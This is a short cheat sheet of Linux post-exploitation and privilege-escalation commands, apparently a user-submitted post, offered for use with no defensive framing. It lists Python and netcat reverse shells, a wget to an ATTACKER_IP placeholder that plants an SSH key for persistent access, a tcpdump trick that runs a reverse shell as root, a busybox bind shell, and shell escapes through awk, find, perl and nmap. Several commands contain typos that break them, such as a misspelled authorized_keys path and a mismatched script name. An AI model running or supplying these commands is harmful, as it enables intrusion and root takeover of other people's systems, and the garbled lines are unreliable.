Title: Linux Post Exploitation and Privilege escalation_1Author: ajayverma
Post exploitation
Get a TTY shell after a reverse shell connection
$ python -c 'import pty;pty.spawn("/bin/bash")'
Set PATH TERM and SHELL if missing:
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
export TERM=xterm
export SHELL=bash

Add public key to authorized keys:
$ echo $(wget https://ATTACKER_IP/.ssh/id_rsa.pub) >> ~/.ssh/authotized_keys

Escaping limited interpreters
Some payloads to overcome limited shells:

$ ssh user@$ip nc $localip 4444 -e /bin/sh
enter user's password
$ python -c 'import pty; pty.spawn("/bin/sh")'
$ export TERM=linux

$ python -c 'import pty; pty.spawn("/bin/sh")'
$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(), *$ 1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

$ echo os.system('/bin/bash')
$ /bin/sh -i

$ exec "/bin/sh";
$ perl —e 'exec "/bin/sh";'

From within tcpdump
$ echo $’id\n/bin/netcat $ip 443 -e /bin/bash’ > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -I eth- -w /dev/null -W 1 -G 1 -z /tmp/.tst -Z root

From busybox
$ /bin/busybox telnetd -|/bin/sh -p9999

:set shell=/bin/bash:shell
find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' ;
awk 'BEGIN {system("/bin/bash")}'
echo "os.execute('/bin/sh')"
sudo nmap --script=exploit.nse
perl -e 'exec "/bin/bash";'

Submitted On: 2019-05-16 16:22:59